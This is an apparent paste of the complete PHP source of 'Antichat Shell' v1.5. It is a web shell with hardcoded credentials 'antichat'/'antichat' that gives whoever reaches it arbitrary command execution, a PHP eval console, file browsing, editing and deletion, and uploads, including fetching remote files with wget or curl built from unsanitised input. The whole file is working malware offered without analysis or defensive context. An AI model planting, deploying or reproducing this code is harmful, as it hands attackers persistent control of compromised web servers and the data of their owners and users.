· 6 years ago · Oct 07, 2019, 10:16 AM
1<?php
2session_start();
3error_reporting(0);
4set_time_limit(9999999);
5$login='antichat';
6$password='antichat';
7$auth=1;
8$version='version 1.5 by Grinay';
9$msgnotice='';
10$style='<STYLE>
11BODY{
12 background-color: #2B2F34;
13 color: #C1C1C7;
14 font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
15 MARGIN-TOP: 0px;
16 MARGIN-BOTTOM: 0px;
17 MARGIN-LEFT: 0px;
18 MARGIN-RIGHT: 0px;
19 margin:0;
20 padding:0;
21 scrollbar-face-color: #336600;
22 scrollbar-shadow-color: #333333;
23 scrollbar-highlight-color: #333333;
24 scrollbar-3dlight-color: #333333;
25 scrollbar-darkshadow-color: #333333;
26 scrollbar-track-color: #333333;
27 scrollbar-arrow-color: #333333;
28}
29input{
30 background-color: #336600;
31 font-size: 8pt;
32 color: #FFFFFF;
33 font-family: Tahoma;
34 border: 1 solid #666666;
35}
36select{
37 background-color: #336600;
38 font-size: 8pt;
39 color: #FFFFFF;
40 font-family: Tahoma;
41 border: 1 solid #666666;
42}
43textarea{
44 background-color: #333333;
45 font-size: 8pt;
46 color: #FFFFFF;
47 font-family: Tahoma;
48 border: 1 solid #666666;
49}
50a:link{
51
52 color: #B9B9BD;
53 text-decoration: none;
54 font-size: 8pt;
55}
56a:visited{
57 color: #B9B9BD;
58 text-decoration: none;
59 font-size: 8pt;
60}
61a:hover, a:active{
62 width: 100%;
63 background-color: #A8A8AD;
64
65
66 color: #E7E7EB;
67 text-decoration: none;
68 font-size: 8pt;
69}
70td, th, p, li{
71 font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
72 border-color:black;
73}
74</style>';
75$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
76$footer='</body></html>';
77
78//error parser
79$filext="File already exists.";
80$uploadok="File was successfully uploaded.";
81$dircrt="Dir is created.";
82$dircrterr="Don't create dir.";
83$dirnf="Dir not found.";
84$empty="Directory not empty or access denide.";
85$deletefileok="File deleted";
86$deletedirok="Dir deleted";
87//end error parser
88
89//auth
90if(@$_POST['action']=="exit")unset($_SESSION['an']);
91if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
92if(@$_SESSION['an']==0){
93echo $header;
94echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
95echo $footer;
96exit;}
97//end auth
98
99function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
100
101
102
103if($_SESSION['action']=="")$_SESSION['action']="viewer";
104if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
105if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
106
107$dir=chdir($dir);
108$dir=getcwd()."/";
109$dir=str_replace("\\","/",$dir);
110
111
112
113
114
115
116//crdir
117
118
119if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
120
121//Current type OS
122if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
123
124
125
126
127
128
129
130//downloader
131if($action=="download"){
132header('Content-Length:'.filesize($file).'');
133header('Content-Type: application/octet-stream');
134header('Content-Disposition: attachment; filename="'.$file.'"');
135readfile($file);
136}
137//end downloader
138
139//delete file
140if($action=="delete"){
141if(unlink($file)) $msgnotice.=$deletefileok;
142}
143//end delete
144
145//delete dir
146if($action=="deletedir"){
147if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
148
149}
150//end delete
151?>
152
153<? echo $header;?>
154<!--content-->
155<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
156<table><tr>
157<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
158<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
159<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
160<td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
161<td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
162<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
163<td><a href="#" onclick="history.back();"> <-back |</a></td>
164<td><a href="#" onclick="history.forward();"> forward->|</a></td>
165
166</tr></table></td></tr></table><br>
167<form name='reqs' method='POST'>
168<input name='action' type='hidden' value=''>
169<input name='dir' type='hidden' value=''>
170<input name='file' type='hidden' value=''>
171</form>
172<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
173<tr><td width="100%" valign="top">
174<!--end one content-->
175<?php if(@$msgnotice!="") echo $msgnotice;?>
176<?
177
178//shell
179function shell($cmd){
180if (!empty($cmd)){
181 $fp = popen($cmd,"r");
182 {
183 $result = "";
184 while(!feof($fp)){$result.=fread($fp,1024);}
185 pclose($fp);
186 }
187 $ret = $result;
188 $ret = convert_cyr_string($ret,"d","w");
189}
190return $ret;}
191
192if($action=="shell"){
193echo "<form method=\"POST\">
194<input type=\"hidden\" name=\"action\" value=\"shell\">
195<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
196<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
197<input type=\"submit\" value=\"execute\"></form>";}
198//end shell
199
200
201//viewer FS
202function perms($file)
203{
204 $perms = fileperms($file);
205 if (($perms & 0xC000) == 0xC000) {$info = 's';}
206 elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
207 elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
208 elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
209 elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
210 elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
211 elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
212 else {$info = 'u';}
213 $info .= (($perms & 0x0100) ? 'r' : '-');
214 $info .= (($perms & 0x0080) ? 'w' : '-');
215 $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
216 $info .= (($perms & 0x0020) ? 'r' : '-');
217 $info .= (($perms & 0x0010) ? 'w' : '-');
218 $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
219 $info .= (($perms & 0x0004) ? 'r' : '-');
220 $info .= (($perms & 0x0002) ? 'w' : '-');
221 $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
222 return $info;
223}
224
225function view_size($size)
226{
227 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
228 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
229 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
230 else {$size = $size . " B";}
231 return $size;
232}
233
234function scandire($dir){
235
236
237
238echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
239echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
240
241if (is_dir($dir)) {
242 if (@$dh = opendir($dir)) {
243 while (($file = readdir($dh)) !== false) {
244 if(filetype($dir . $file)=="dir") $dire[]=$file;
245 if(filetype($dir . $file)=="file")$files[]=$file;
246 }
247 closedir($dh);
248 @sort($dire);
249 @sort($files);
250
251
252if ($GLOBALS['win']==1) {
253echo "<tr><td>Select drive:";
254for ($j=ord('C'); $j<=ord('Z'); $j++)
255 if (@$dh = opendir(chr($j).":/"))
256 echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
257 echo "</td></tr>";
258}
259echo "<tr><td>OS: ".@php_uname()."</td></tr>
260<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
261for($i=0;$i<count($dire);$i++) {
262$link=$dir.$dire[$i];
263 echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
264 }
265for($i=0;$i<count($files);$i++) {
266$linkfile=$dir.$files[$i];
267echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
268<td>'.perms($linkfile).'</td>
269<td>
270<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
271<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
272<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
273</tr>';
274}
275echo "</table>";
276}}}
277
278if($action=="viewer"){
279scandire($dir);
280}
281//end viewer FS
282
283//editros
284if($action=="editor"){
285 function writef($file,$data){
286 $fp = fopen($file,"w+");
287 fwrite($fp,$data);
288 fclose($fp);
289 }
290 function readf($file){
291 if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
292 $contents = fread($le, filesize($file));
293 fclose($le);}
294 return htmlspecialchars($contents);
295 }
296if(@$_POST['save'])writef($file,$_POST['data']);
297echo "<form method=\"POST\">
298<input type=\"hidden\" name=\"action\" value=\"editor\">
299<input type=\"hidden\" name=\"file\" value=\"".$file."\">
300<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
301<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
302}
303//end editors
304
305//upload
306if($action=="upload"){
307 if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
308 $form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
309 if($GLOBALS['win']==1)echo $form_win;
310 if($GLOBALS['win']==0){
311 echo $form_win;
312 echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
313<input type=submit name=upload value=Upload></form></td></tr>';
314}
315
316if(@$_POST['uploadloc']){
317if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else
318$uploadfile = $dirupload."/".$_POST['filename'];
319
320if(!file_exists($dirupload)){createdir($dirupload);}
321if(file_exists($uploadfile))echo $GLOBALS['filext'];
322elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
323echo $GLOBALS['uploadok'];
324}
325
326if(@$_POST['upload']){
327 if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
328 switch($_POST['with'])
329 {
330 case wget:
331 shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
332 break;
333 case fetch:
334 shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
335 break;
336 case lynx:
337 shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
338 break;
339 case links:
340 shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
341 break;
342 case GET:
343 shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
344 break;
345 case curl:
346 shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
347 break;
348 }
349 }
350
351}
352//end upload section
353
354
355if($action=="phpeval"){
356 echo "
357<form method=\"POST\">
358 <input type=\"hidden\" name=\"action\" value=\"phpheval\">
359 <?php<br>
360<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
361?><br>
362<input type=\"submit\" value=\"execute\"></form>";}
363if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
364?>
365</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
366<? echo $footer;?>